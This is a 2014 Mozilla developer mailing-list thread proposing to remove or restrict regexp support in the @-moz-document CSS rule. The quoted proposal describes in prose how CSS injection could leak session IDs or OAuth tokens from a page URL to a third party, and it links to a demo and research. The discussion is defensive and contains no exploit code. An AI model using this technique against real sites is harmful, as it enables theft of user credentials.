Re: Unimplement: @-moz-document regexp support?

Tue, 08 Jul 2014 16:42:07 -0700 

On 2014-07-08, 6:34 PM, L. David Baron wrote:

On Monday 2014-07-07 15:18 -0400, Ehsan Akhgari wrote:

That seems pretty bad.  I think we should at least stop supporting
it for Web content.  David, what do you think?


I'm ok with restricting it to UA and user style sheets, although if
we're going to do that because of security risks I'd like to get a
good understanding of what those are and of what we do and don't
expect authors to do when sanitizing CSS from untrusted sources to
include in their Web content.

I think it might make more sense to continue discussion in the bug.


Sounds great!


(I also think sending this out in the format of an
intent-to-implement message was confusing for an initial proposal to
do something that hadn't yet been discussed with any owners or peers
of the module.  I think the format is intended to say that a change
has already been accepted by owners/peers but requires wider
review.)


Yes indeed.  Admittedly I was a bit confused.


Summary:

Attackers can extract secret URL components (e.g. session IDs, oauth
tokens) using @-moz-document. Using the regexp support and assuming a
CSS injection (no XSS needed!), the attacker can probe the current URL
with some regular expressions and send the URL parameters to a third party.

A demo of this exploit can be found at <http://html5sec.org/cssession/>.
This attack has also been published in the academic paper "Scriptless
Attacks: Stealing the pie without touching the sill"[1] by Mario
Heiderich et al. and numerous other presentations on this topic [2,3].

My suggestion is to either kill -moz-document for public web content or
remove regexp support.


What do you think?


Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091
Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4
selectors.
MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document
Target release: ??
Platform coverage: desktop, android




[1] http://www.nds.rub.de/research/publications/scriptless-attacks/
[2] http://www.slideshare.net/x00mario/stealing-the-pie
[3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013
_______________________________________________
dev-platform mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-platform





_______________________________________________
dev-platform mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-platform






















					Reply via email to